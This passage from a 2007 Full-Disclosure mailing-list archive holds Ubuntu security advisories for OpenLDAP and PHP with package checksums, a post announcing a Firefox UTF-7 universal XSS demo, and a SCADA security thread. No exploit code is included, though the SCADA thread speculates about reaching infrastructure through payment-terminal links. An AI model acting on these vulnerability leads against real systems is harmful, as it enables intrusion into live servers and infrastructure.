http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/openldap2.3_2.3.30-2ubuntu0.1.diff.gz
      Size/MD5:   139726 79fb0171f368ca4312d48d4c695edb53

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/openldap2.3_2.3.30-2ubuntu0.1.dsc
      Size/MD5:     1295 fc1bc630868634c3937dea90fe7f9c4e

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/openldap2.3_2.3.30.orig.tar.gz
      Size/MD5:  2971126 c40bcc23fa65908b8d7a86a4a6061251

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/ldap-utils_2.3.30-2ubuntu0.1_amd64.deb
      Size/MD5:   187572 cb6072c694a417d01d3da06c94977a4e

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap-2.3-0_2.3.30-2ubuntu0.1_amd64.deb
      Size/MD5:   292212 5afbe83546e56db28b59906d7820d92d

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/slapd_2.3.30-2ubuntu0.1_amd64.deb
      Size/MD5:  1227928 e2e2e821b94b2940bd599ad513922d7f

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/ldap-utils_2.3.30-2ubuntu0.1_i386.deb
      Size/MD5:   155982 05d6d346c35f7e6f3e3b3f13916cc7cb

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap-2.3-0_2.3.30-2ubuntu0.1_i386.deb
      Size/MD5:   267352 c0309cfc9c84f183df478d51c040400b

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/slapd_2.3.30-2ubuntu0.1_i386.deb
      Size/MD5:  1154660 fa9fd13816f4181219749a39ec891413

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/ldap-utils_2.3.30-2ubuntu0.1_powerpc.deb
      Size/MD5:   203570 ee80e1eeb0e3affccecc9974bbc3e91d

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap-2.3-0_2.3.30-2ubuntu0.1_powerpc.deb
      Size/MD5:   294320 67698b61c8e2aa0b914b02483449813c

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/slapd_2.3.30-2ubuntu0.1_powerpc.deb
      Size/MD5:  1280328 a559f7311835769efd965854e324036e

  sparc architecture (Sun SPARC/UltraSPARC):


http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/ldap-utils_2.3.30-2ubuntu0.1_sparc.deb
      Size/MD5:   164312 51a13892bf9013a12b2f356282281421

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap-2.3-0_2.3.30-2ubuntu0.1_sparc.deb
      Size/MD5:   264178 6fccf9f07791c6cf5ed41c52cdaac2cb

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/slapd_2.3.30-2ubuntu0.1_sparc.deb
      Size/MD5:  1169780 f5d2064a6f5a560151865d87d963e3db

Updated packages for Ubuntu 7.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/openldap2.3_2.3.35-1ubuntu0.1.diff.gz
      Size/MD5:   153304 035a13818eebaca172ef7fb2e1b73f83

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/openldap2.3_2.3.35-1ubuntu0.1.dsc
      Size/MD5:     1305 89bc62db8536ab8292fc3afabbce98b5

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/openldap2.3_2.3.35.orig.tar.gz
      Size/MD5:  2947629 5096146b7a7eb6ce3b0a97549347b5be

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/ldap-utils_2.3.35-1ubuntu0.1_amd64.deb
      Size/MD5:   189744 dce285ce9164fe57f56d99a53935205a

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap-2.3-0_2.3.35-1ubuntu0.1_amd64.deb
      Size/MD5:   346882 1e33bf330b7551e2035ba32f576ed8c7

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/slapd_2.3.35-1ubuntu0.1_amd64.deb
      Size/MD5:  1295526 f16e6d501bb115b4c5b24ac7af676043

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/ldap-utils_2.3.35-1ubuntu0.1_i386.deb
      Size/MD5:   155172 b1229c692b2b0e90842f2a3963710d44

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap-2.3-0_2.3.35-1ubuntu0.1_i386.deb
      Size/MD5:   314500 ea70a6f6d29f2458401cd0de1a99772f

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/slapd_2.3.35-1ubuntu0.1_i386.deb
      Size/MD5:  1215670 083901dcaadcb356d8d743facbe76410

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/ldap-utils_2.3.35-1ubuntu0.1_powerpc.deb
      Size/MD5:   204936 8144ae85dd773e4126bfb13dda6f383f

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap-2.3-0_2.3.35-1ubuntu0.1_powerpc.deb
      Size/MD5:   345608 449f262dee94fc35f907e3da735b2ff0

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/slapd_2.3.35-1ubuntu0.1_powerpc.deb
      Size/MD5:  1344728 bec28b0dfb90095961a484ec2f3cc96e

  sparc architecture (Sun SPARC/UltraSPARC):


http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/ldap-utils_2.3.35-1ubuntu0.1_sparc.deb
      Size/MD5:   166128 e14bbb2254d7a577b3f04453b8743ac5

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap-2.3-0_2.3.35-1ubuntu0.1_sparc.deb
      Size/MD5:   306682 95a1008f5696a6d9cb6f9e7e521c7ab8

http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/slapd_2.3.35-1ubuntu0.1_sparc.deb
      Size/MD5:  1228072 8ffd29411e996e6a5853f29621d092d3


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHVMZ2W0JvuRdL8BoRAo44AJ4lKdQaZEkOT/rJCCH87ZHB/sPK9ACghXsW
uzbIzU1FCeG9gaq4dD0g+kQ=
=QjYS
-----END PGP SIGNATURE-----



From kees at ubuntu.com  Tue Dec  4 03:45:53 2007
From: kees at ubuntu.com (Kees Cook)
Date: Mon, 3 Dec 2007 19:45:53 -0800
Subject: [Full-disclosure] [USN-549-2] PHP regression
Message-ID: <20071204034553.GQ8789@outflux.net>

=========================================================== 
Ubuntu Security Notice USN-549-2          December 03, 2007
php5 regression
https://launchpad.net/bugs/173043
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 7.10:
  libapache2-mod-php5             5.2.3-1ubuntu6.2
  php5-cgi                        5.2.3-1ubuntu6.2
  php5-cli                        5.2.3-1ubuntu6.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

USN-549-1 fixed vulnerabilities in PHP.  However, some upstream changes
were incomplete, which caused crashes in certain situations with Ubuntu
7.10.  This update fixes the problem.

We apologize for the inconvenience.

Original advisory details:

 It was discovered that the wordwrap function did not correctly
 check lengths.  Remote attackers could exploit this to cause
 a crash or monopolize CPU resources, resulting in a denial of
 service. (CVE-2007-3998)

 Integer overflows were discovered in the strspn and strcspn functions.
 Attackers could exploit this to read arbitrary areas of memory, possibly
 gaining access to sensitive information. (CVE-2007-4657)

 Stanislav Malyshev discovered that money_format function did not correctly
 handle certain tokens.  If a PHP application were tricked into processing
 a bad format string, a remote attacker could execute arbitrary code with
 application privileges. (CVE-2007-4658)

 It was discovered that the php_openssl_make_REQ function did not
 correctly check buffer lengths.  A remote attacker could send a
 specially crafted message and execute arbitrary code with application
 privileges. (CVE-2007-4662)

 It was discovered that certain characters in session cookies were not
 handled correctly.  A remote attacker could injection values which could
 lead to altered application behavior, potentially gaining additional
 privileges. (CVE-2007-3799)

 Gerhard Wagner discovered that the chunk_split function did not
 correctly handle long strings.  A remote attacker could exploit this
 to execute arbitrary code with application privileges.  (CVE-2007-2872,
 CVE-2007-4660, CVE-2007-4661)

 Stefan Esser discovered that deeply nested arrays could be made to
 fill stack space.  A remote attacker could exploit this to cause a
 crash or monopolize CPU resources, resulting in a denial of service.
 (CVE-2007-1285, CVE-2007-4670)

 Rasmus Lerdorf discovered that the htmlentities and htmlspecialchars
 functions did not correctly stop when handling partial multibyte
 sequences.  A remote attacker could exploit this to read certain areas of
 memory, possibly gaining access to sensitive information. (CVE-2007-5898)

 It was discovered that the output_add_rewrite_var fucntion would
 sometimes leak session id information to forms targeting remote URLs.
 Malicious remote sites could use this information to gain access to a
 PHP application user's login credentials. (CVE-2007-5899)


Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.2.3-1ubuntu6.2.diff.gz
      Size/MD5:   126545 02fbb9e80b615dc9a718d60c9367538a
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.2.3-1ubuntu6.2.dsc
      Size/MD5:     1921 d8aec3af9962e69e67bc7ae6bfa31537
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.2.3.orig.tar.gz
      Size/MD5:  9341653 df79b04d63fc4c1ccb6d8ea58a9cf3ac

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php-pear_5.2.3-1ubuntu6.2_all.deb
      Size/MD5:   351400 62ead0de4a2ea48ca87be08b0448f5ab
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.2.3-1ubuntu6.2_all.deb
      Size/MD5:     1082 77c1c2ec676628707caf5588962f0f45

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.2.3-1ubuntu6.2_amd64.deb
      Size/MD5:  2669448 95ae60da41ef7b4594f86ff5264a13d4
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.2.3-1ubuntu6.2_amd64.deb
      Size/MD5:  5190794 1758c00b1b859342f5c3e73e5e867bbd
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.2.3-1ubuntu6.2_amd64.deb
      Size/MD5:  2617924 b4bda6f34586d6c8887cb2c10079ea76
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.2.3-1ubuntu6.2_amd64.deb
      Size/MD5:   222450 67e1f5d10721cad22936f0068211a3c7
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.2.3-1ubuntu6.2_amd64.deb
      Size/MD5:    24778 811ec34d4ea460b00fac5bdb16e9b8f5
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.2.3-1ubuntu6.2_amd64.deb
      Size/MD5:   355046 dfb88072d5b404ee353f4af63ae9ebb2
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.2.3-1ubuntu6.2_amd64.deb
      Size/MD5:    37826 6c17e662bb7a6b2c525a705d91fa65d5
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.2.3-1ubuntu6.2_amd64.deb
      Size/MD5:    19948 753ec86c6795479bc0891ca9c0670b91
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.2.3-1ubuntu6.2_amd64.deb
      Size/MD5:     5516 66519e995a609455868d5ad23e927221
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.2.3-1ubuntu6.2_amd64.deb
      Size/MD5:    73880 afcde53c84b70c2f9882d6c319f0ca6c
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.2.3-1ubuntu6.2_amd64.deb
      Size/MD5:    37356 ee6186620f7ee27b153c5104db3fa541
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.2.3-1ubuntu6.2_amd64.deb
      Size/MD5:    55904 99be8556d41e3561a25e24c281d0a11b
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pspell_5.2.3-1ubuntu6.2_amd64.deb
      Size/MD5:     9642 c3295facb9fa364802abb6857f46f63d
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.2.3-1ubuntu6.2_amd64.deb
      Size/MD5:     4996 455b57531d167ecc89555e6e1f5605de
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.2.3-1ubuntu6.2_amd64.deb
      Size/MD5:    12352 fdca6404e8a8621fa702f1866e46751a
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.2.3-1ubuntu6.2_amd64.deb
      Size/MD5:    39482 55d7eb36b22298c3cae3305ea6e210f4
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.2.3-1ubuntu6.2_amd64.deb
      Size/MD5:    19824 8d13dfe918c0cea9d41fae314e22452d
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-tidy_5.2.3-1ubuntu6.2_amd64.deb
      Size/MD5:    17880 9ab41423658fbff93ae9c9012400d8ac
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.2.3-1ubuntu6.2_amd64.deb
      Size/MD5:    40808 eb5b2070dab4107f00e8e7475eab2b14
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.2.3-1ubuntu6.2_amd64.deb
      Size/MD5:    13368 8dc3c21c551572a5187341fe7f9368a4

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.2.3-1ubuntu6.2_i386.deb
      Size/MD5:  2542558 0fa871af840de95357d417e81b1bde12
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.2.3-1ubuntu6.2_i386.deb
      Size/MD5:  5024704 4d076101de583289f74b472f66a3d321
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.2.3-1ubuntu6.2_i386.deb
      Size/MD5:  2530522 a45f9fae50da18f4455a55c166b73f0a
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.2.3-1ubuntu6.2_i386.deb
      Size/MD5:   218722 5c3bc75d5873441488fd0c8f65c2b53f
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.2.3-1ubuntu6.2_i386.deb
      Size/MD5:    23598 a04e61affc316a84891bad58ee0eddbd
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.2.3-1ubuntu6.2_i386.deb
      Size/MD5:   355044 94e2c641392ac5ae29e237c5132382f7
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.2.3-1ubuntu6.2_i386.deb
      Size/MD5:    33490 0afcb138e970ca9d10dc1d754470494e
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.2.3-1ubuntu6.2_i386.deb
      Size/MD5:    17970 b0258ea33e7642deb82aaead60a0e978
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.2.3-1ubuntu6.2_i386.deb
      Size/MD5:     5194 49596e1453c3131e06af3e045a623977
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.2.3-1ubuntu6.2_i386.deb
      Size/MD5:    65216 80135f11d58a1c872d4d60989baedf48
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.2.3-1ubuntu6.2_i386.deb
      Size/MD5:    34432 29f2821eafc5fbf46a6e8ca4feec1970
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.2.3-1ubuntu6.2_i386.deb
      Size/MD5:    51304 e66d6510daaaa6b4a6d4b64a5f7a0a60
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pspell_5.2.3-1ubuntu6.2_i386.deb
      Size/MD5:     8700 a594aa7f95afa110e83e529b97aa2f40
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.2.3-1ubuntu6.2_i386.deb
      Size/MD5:     4774 5a766568c97f65f2be95c60f4a57bda9
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.2.3-1ubuntu6.2_i386.deb
      Size/MD5:    11562 a663a6acf219a33af357f78c70c6b89d
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.2.3-1ubuntu6.2_i386.deb
      Size/MD5:    34496 ab97a8b5c2b87c89517c6372907e4223
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.2.3-1ubuntu6.2_i386.deb
      Size/MD5:    18134 9b97f35dd2cf631b8d4d407b802e09ba
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-tidy_5.2.3-1ubuntu6.2_i386.deb
      Size/MD5:    16348 061fc0d3060ab441b7319608d7968ac6
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.2.3-1ubuntu6.2_i386.deb
      Size/MD5:    37722 9d9eba9fd632f8d473ed095e17ad6d57
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.2.3-1ubuntu6.2_i386.deb
      Size/MD5:    12402 355d6a8d187b53704d169ac2527b51a3

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.2.3-1ubuntu6.2_powerpc.deb
      Size/MD5:  2742574 b90d20abf4b71b58d67902f0904e3f54
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.2.3-1ubuntu6.2_powerpc.deb
      Size/MD5:  5270574 67c8541045c90489d495ce234f6e1ffb
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.2.3-1ubuntu6.2_powerpc.deb
      Size/MD5:  2654246 f27259c7b3841e50bf3c86dc782b20f0
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.2.3-1ubuntu6.2_powerpc.deb
      Size/MD5:   225816 31458de4e7c9177f0138973fc0d5b25b
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.2.3-1ubuntu6.2_powerpc.deb
      Size/MD5:    28060 86f7e5fad55a12472c985c32f743f015
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.2.3-1ubuntu6.2_powerpc.deb
      Size/MD5:   355080 fecb9665cbde35a8518b600cdf205fb4
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.2.3-1ubuntu6.2_powerpc.deb
      Size/MD5:    39110 adc0322de702ada2e0b80e490e417685
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.2.3-1ubuntu6.2_powerpc.deb
      Size/MD5:    21724 edc5f9999abac743ecc66592cecf3767
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.2.3-1ubuntu6.2_powerpc.deb
      Size/MD5:     7640 6377891afce3ee5b592c32cc95b42f95
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.2.3-1ubuntu6.2_powerpc.deb
      Size/MD5:    78026 47fd399637c816e4a4206f76cd9d8afc
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.2.3-1ubuntu6.2_powerpc.deb
      Size/MD5:    40974 641321c2fb3f5b8de7d772f3eeba46bc
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.2.3-1ubuntu6.2_powerpc.deb
      Size/MD5:    59574 58b072639918acd35515d8eceb76971d
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pspell_5.2.3-1ubuntu6.2_powerpc.deb
      Size/MD5:    11248 4e667071c4471a24ecae795485aa3655
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.2.3-1ubuntu6.2_powerpc.deb
      Size/MD5:     7172 1d98c91eafdf94442f8e4efddcbc0946
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.2.3-1ubuntu6.2_powerpc.deb
      Size/MD5:    14118 6fc7790c62b8a7ae231a974271ce40f5
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.2.3-1ubuntu6.2_powerpc.deb
      Size/MD5:    42674 53a718dcd9cebd06054ca7bcba4b31c6
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.2.3-1ubuntu6.2_powerpc.deb
      Size/MD5:    21860 b210d78bfc0a04fa53f45b901ad3158e
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-tidy_5.2.3-1ubuntu6.2_powerpc.deb
      Size/MD5:    20138 a5b73e99fe5320576a0ade3b9aca0cd4
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.2.3-1ubuntu6.2_powerpc.deb
      Size/MD5:    43136 29eb3af8e346b10ae0c150406e16b996
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.2.3-1ubuntu6.2_powerpc.deb
      Size/MD5:    15466 e1e046bc8e77d9237038abce92763c74

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.2.3-1ubuntu6.2_sparc.deb
      Size/MD5:  2576838 4eb1b61129d7191fa5f9a8186a3eb545
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.2.3-1ubuntu6.2_sparc.deb
      Size/MD5:  5020902 a74c4167bd3c9072b62c8e8d4ac40eb9
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.2.3-1ubuntu6.2_sparc.deb
      Size/MD5:  2529358 790f9b28adf0a84e1f5fe8421fb9c5c6
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.2.3-1ubuntu6.2_sparc.deb
      Size/MD5:   218684 d3becd4261e09cdecbcdb17a2c28df2d
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.2.3-1ubuntu6.2_sparc.deb
      Size/MD5:    24486 c0eb7ca78a301b561175403f8a72f1a5
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.2.3-1ubuntu6.2_sparc.deb
      Size/MD5:   355090 4aba6b1a9c1cbe55e43ba0cd2e281740
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.2.3-1ubuntu6.2_sparc.deb
      Size/MD5:    34328 d002fe95e04fa7d471a401d29d18521f
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.2.3-1ubuntu6.2_sparc.deb
      Size/MD5:    17966 74f9b87291910eccdd06138619c27dc8
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.2.3-1ubuntu6.2_sparc.deb
      Size/MD5:     5070 cf33fa098810fe83e872c6156933b410
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.2.3-1ubuntu6.2_sparc.deb
      Size/MD5:    64752 c92758c6d14df97dfcb57d7aa2d6c243
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.2.3-1ubuntu6.2_sparc.deb
      Size/MD5:    32858 23ff82df0be4350ae39a0602e41bfe3e
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.2.3-1ubuntu6.2_sparc.deb
      Size/MD5:    50136 10970c45c6d1f679d478c781881d4adb
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pspell_5.2.3-1ubuntu6.2_sparc.deb
      Size/MD5:     8620 899ac45be91a8ffa5630c99bf91fe059
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.2.3-1ubuntu6.2_sparc.deb
      Size/MD5:     4754 101ac244742ef3c43d95ab1ccd5a0262
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.2.3-1ubuntu6.2_sparc.deb
      Size/MD5:    11428 d8d1fb1c1a8e1b0f60fafc06a0e2ab07
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.2.3-1ubuntu6.2_sparc.deb
      Size/MD5:    33264 b5fe644c2419e3336f23ba47301174cb
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.2.3-1ubuntu6.2_sparc.deb
      Size/MD5:    17918 895e4b8d78babe51b656e5c3536542b0
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-tidy_5.2.3-1ubuntu6.2_sparc.deb
      Size/MD5:    16494 18f96996d94c777cf35150ebb7799653
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.2.3-1ubuntu6.2_sparc.deb
      Size/MD5:    36576 fe16a39635b929178778d1df340e8250
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.2.3-1ubuntu6.2_sparc.deb
      Size/MD5:    11958 98ceda91197ea9d786f66f43d2fd4c4f

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071203/224054dd/attachment.bin 

From psz at maths.usyd.edu.au  Tue Dec  4 11:16:03 2007
From: psz at maths.usyd.edu.au (Paul Szabo)
Date: Tue, 4 Dec 2007 22:16:03 +1100
Subject: [Full-disclosure] Firefox UTF-7 Universal XSS
Message-ID: <200712041116.lB4BG31B008651@asti.maths.usyd.edu.au>

Building on my previous message

  Firefox explicit charset inheritance
  http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/058752.html

now offer a demo of (user-assisted) universal cross-site-scripting in
Firefox. With slight "social engineering", can XSS practically any http
or https sites:

  http://www.maths.usyd.edu.au/u/psz/ff-utf7-uxss.html

For technical details, please see

  https://bugzilla.mozilla.org/show_bug.cgi?id=356280

Cheers,

Paul Szabo   psz at maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia



From joey.mengele at hushmail.com  Tue Dec  4 06:34:55 2007
From: joey.mengele at hushmail.com (Joey Mengele)
Date: Tue, 04 Dec 2007 01:34:55 -0500
Subject: [Full-disclosure] SCADA refresher
Message-ID: <20071204063456.4890D22846@mailserver5.hushmail.com>

Dear I period D period and mailing list,

I also am not qualified to comment on this, so here it goes. I 
don't know shit either, blabla hello electronic mail internets 
2007! I AM FAMOUS ON THE FULL DISCLOSURE LOLOLOL!

J

On Mon, 03 Dec 2007 19:01:40 -0500 "I. D." <soufre at gmail.com> wrote:
>Datapac? In my experience, there aren't many things left there... 
>of course,
>I don't work in that industry. I thought most transactions/work 
>took places
>on other Canadian packet-switched networks. As for south of the 
>border, I
>know even less.
>
>On Dec 3, 2007 2:51 PM, Dude VanWinkle <dudevanwinkle at gmail.com> 
>wrote:
>
>> Also Johnson Controls
>>
>> in 2005 they were busy converting the proprietary BACnet 
>speaking
>> SCADA devices to embedded windows XP, considering NASA and 
>friends run
>> JCI, and there is no good way to update embedded XP (AFAIK) 
>remotely,
>> these systems should be prime targets...
>>
>> Whats an MLP?
>>
>> -JP
>>
>> On Dec 2, 2007 7:52 PM, gmaggro <gmaggro at rogers.com> wrote:
>> > Been giving myself a little refresher on SCADA, hope no-one 
>minds the
>> MLP.
>> >
>> > Stock presentation on SCADA security issues:
>> >
>> >
>> http://www.blackhat.com/presentations/bh-federal-06/BH-Fed-06-
>Maynor-Graham-up.pdf
>> >
>> > Ganesh Devarajan's Defcon presentation was interesting:
>> >   
>http://video.google.com/videoplay?docid=2434649448102709100&hl=en
>> >
>> > Makes of SCADA and related products I have seen in actual use:
>> >   Allen Bradley (hardware)
>> >   Siemens       (hardware)
>> >   RAND          (hardware)
>> >   ABB           (hardware)
>> >   Wonderware    (software, assuming this was what Ganesh was 
>assaulting)
>> >
>> > Well, assuming it was Wonderware (http://us.wonderware.com) 
>since in
>> > multiple networks of hundreds of thousands of nodes, and the 
>companies
>> > that own them... Wonderware was the only SCADA related package 
>that
>> > creeped up.
>> >
>> > On a different and amusing note, X.25 was still in use in a 
>number of
>> > these locations. Take that for what you will, but I don't 
>think that's a
>> > good sign. Hello, Datapac! However I have little idea what the 
>X.25
>> > landscape is like anymore.  Would be interesting if both
>> > credit/financial and infrastructure data regularly travelled 
>over the
>> > same paths. Get access to a lottery/debit terminal, or just 
>its
>> > connectivity, and leverage that.
>> >
>> > 24th Chaos Communication Congress "Hacking SCADA", it sure 
>would be nice
>> > to make it over:
>> >   
>http://events.ccc.de/congress/2007/Fahrplan/events/2227.en.html
>> >
>> > More amusement, though it's a subscription site:
>> >   
>http://www.digitalbond.com/wiki/index.php/SCADA_IDS_Signatures
>> >
>> > Anyone have any resources they'd care to share?
>> >
>> > _______________________________________________
>> > Full-Disclosure - We believe in it.
>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> > Hosted and sponsored by Secunia - http://secunia.com/
>> >
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>

--
Want fast fitness results? Click for free info, revolutionary products.
http://tagline.hushmail.com/fc/Ioyw6h4eJVhyeSyiXbrS2j5aRw5p6bXp3dQSoK8qxVxZr7t5JIYx8s/



From research at sec-consult.com  Tue Dec  4 13:56:42 2007
From: research at sec-consult.com (Bernhard Mueller)
Date: Tue, 4 Dec 2007 14:56:42 +0100
Subject: [Full-disclosure] SEC Consult SA-20071204-0 :: SonicWALL Global VPN
	Client Format	String Vulnerability
Message-ID: <1196776602.6253.11.camel@b4byl0n>

